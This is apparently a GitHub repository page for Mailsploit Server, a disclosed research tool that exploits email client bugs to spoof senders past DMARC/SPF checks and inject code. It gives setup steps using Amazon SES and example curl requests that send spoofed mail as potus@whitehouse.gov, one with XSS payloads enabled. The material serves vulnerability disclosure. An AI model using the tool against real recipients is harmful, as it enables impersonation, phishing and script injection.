Skip to content

(Released in December 2017) Mailsploit is a collection of bugs in email clients that allow effective sender spoofing and code injection attacks. The spoofing is not detected by Mail Transfer Agents (MTA) aka email servers, therefore circumventing spoofing protection mechanisms such as DMARC (DKIM/SPF) or spam filters.

master
Go to file
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
Jun 16, 2018
Jun 16, 2018
Nov 17, 2017
Jun 16, 2018
Nov 17, 2017
Jun 16, 2018
Nov 17, 2017
Jun 16, 2018

README.md

Mailsploit logo

Mailsploit Server

Note: You will need an Amazon SES account with a verified domain in order to use the tool. Also, the web server can only run at 88 miles per hour.

How to install

  1. Clone the repository
  2. Edit originalFrom in src/main/Config.ts with your verified SES email address.
  3. Run the following commands in the terminal:
yarn install && yarn dist # Require yarn

How to launch the web server

  1. Run the following command in the terminal:
SES_USERNAME=[Amazon SES Username] SES_PASSWORD=[Amazon SES Password] node dist/commonjs/index.js
  1. That's it. The server will run on localhost:8081

How to use it

You can do a POST request containing sender, receiver and options (from 0 to 13) parameters to the /process endpoint.

Example using cURL (payload 3 without XSS):

curl --url http://localhost:8081/process --data "sender=potus@whitehouse.gov&receiver=sabri@riseup.net&options=2"

or, all the payloads with XSS:

curl --url http://localhost:8081/process --data "sender=potus@whitehouse.gov&receiver=sabri@riseup.net&xss=true&options=-1"

All the payloads are available here.

About

(Released in December 2017) Mailsploit is a collection of bugs in email clients that allow effective sender spoofing and code injection attacks. The spoofing is not detected by Mail Transfer Agents (MTA) aka email servers, therefore circumventing spoofing protection mechanisms such as DMARC (DKIM/SPF) or spam filters.

Resources

Releases

No releases published

Packages

No packages published
You can’t perform that action at this time.